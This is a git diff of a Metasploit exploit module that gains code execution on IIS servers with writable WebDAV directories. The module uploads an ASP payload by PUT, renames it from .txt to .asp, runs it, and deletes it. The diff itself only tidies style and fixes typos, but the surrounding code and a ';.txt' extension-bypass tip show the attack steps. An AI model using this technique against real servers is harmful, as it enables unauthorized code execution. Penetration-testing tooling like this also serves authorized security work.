diff --git a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb index 55392c83c4..60c0e47956 100644 --- a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb +++ b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb @@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize super( 'Name' => 'Microsoft IIS WebDAV Write Access Code Execution', - 'Description' => %q{ + 'Description' => %q{ This module can be used to execute a payload on IIS servers that have world-writeable directories. The payload is uploaded as an ASP script via a WebDAV PUT request. @@ -40,16 +40,16 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ - # The USERNAME and PASSWORD are registered again to make them more obvious they're - # configurable. + # The USERNAME and PASSWORD are registered again to make them more obvious they're + # configurable. OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']), OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']), OptString.new('PATH', - [ true, "The path to attempt to upload", '/metasploit%RAND%.asp']), + [ true, 'The path to attempt to upload', '/metasploit%RAND%.asp']), OptEnum.new('METHOD', - [true, 'Move or copy the file on the remote system from .txt -> .asp', 'move', ['move','copy']]) + [ true, 'Move or copy the file on the remote system from .txt -> .asp', 'move', ['move','copy']]) ], self.class) end @@ -75,13 +75,13 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET', }, 20) - if (!res) - print_error("Connection timed out while trying to check #{path}") + unless res + print_error("Connection timed out while trying to checking #{path}") return end - if (res.code == 200) - print_error("File #{path} alrady exists on the target") + if (res.code == 200) + print_error("File #{path} already exists on the target") return end @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote return end - if (!res) + unless res print_error("Connection timed out while uploading to #{path_tmp}") return end @@ -128,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote 'headers' => {'Destination' => path} }, 20) - if (!res) + unless res print_error("Connection timed out while moving to #{path}") return end @@ -157,9 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET' }, 20) - sleep(2) - - if (!res) + unless res print_error("Execution failed on #{path} [No Response]") return end @@ -170,7 +168,7 @@ class Metasploit3 < Msf::Exploit::Remote when 'Not Found', 'Object Not Found' print_error("The #{datastore['METHOD'].upcase} action failed. Possibly IIS doesn't allow 'Script Resource Access'") print_warning("Try using 'set METHOD #{alt_method}' instead") - vprint_warning("Pro Tip: Try 'set PATH /metasploit%RAND%.asp;.txt' instead") if not path.include? ";" + vprint_warning("Pro Tip: Try 'set PATH /metasploit%RAND%.asp;.txt' instead") unless path.include? ";" end return end @@ -186,13 +184,13 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'DELETE' }, 20) - if (!res) + unless res print_error("Deletion failed on #{path} [No Response]") return end if (res.code < 200 or res.code >= 300) - # Changed this to a warning, because red is scary and if this aprt fails, + # Changed this to a warning, because red is scary and if this part fails, # honestly it's not that bad. In most cases this is probably expected anyway # because by default we're using IWAM_*, which doesn't give us a lot of # freedom to begin with.